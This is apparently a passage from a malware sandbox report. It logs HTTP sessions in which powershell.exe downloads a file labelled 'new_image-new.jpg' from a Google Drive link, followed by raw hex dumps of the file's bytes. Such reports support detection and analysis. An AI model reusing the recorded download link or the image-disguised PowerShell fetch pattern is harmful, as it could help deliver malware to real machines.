                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.2249172142.250.186.97443204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:39:59 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:40:02 UTC4906INHTTP/1.1 200 OK
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2239109
                                                                                              Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                              X-GUploader-UploadID: AHmUCY36FRB9jxr1pEWjXVitgUXIp9nSIwePHiw1bgPgligXYFCTjLjrojlKyaVXd96w9h8bYcTVSe3x-Q
                                                                                              Date: Thu, 24 Oct 2024 06:40:02 GMT
                                                                                              Expires: Thu, 24 Oct 2024 06:40:02 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=WqxmdA==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-10-24 06:40:02 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                              2024-10-24 06:40:02 UTC4888INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                              Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                              2024-10-24 06:40:02 UTC1321INData Raw: c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60
                                                                                              Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                              Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                              Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                              Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                              Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                              Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                              Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                              Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.2249173216.58.212.1744433900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:40:07 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                              Host: drive.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:40:08 UTC1319INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 06:40:07 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mle0fBkQmDcx9q2ZM00ZWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.2249174142.250.186.974433900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 06:40:09 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:40:12 UTC4906INHTTP/1.1 200 OK
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2239109
                                                                                              Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                              X-GUploader-UploadID: AHmUCY2aL8-CywcUcQZr3JV20z9OplPkTkTczxiCSmx0AGa7ol2xJMH0ecrAFI1t_lnv6q7fwt88m2GWZw
                                                                                              Date: Thu, 24 Oct 2024 06:40:12 GMT
                                                                                              Expires: Thu, 24 Oct 2024 06:40:12 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=WqxmdA==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-10-24 06:40:12 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                              2024-10-24 06:40:12 UTC4888INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                              Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60
                                                                                              Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`
                                                                                              2024-10-24 06:40:12 UTC1378INData Raw: 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a 5f 11 d4 84 04 02 4b 75 e3 91 ed 81 a1 a2 fb 43 18 3e 5e b2 44 0f c8 de 08 02 fe 20 74 cd 5d 3c cb aa 09
                                                                                              Data Ascii: p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE_KuC>^D t]<
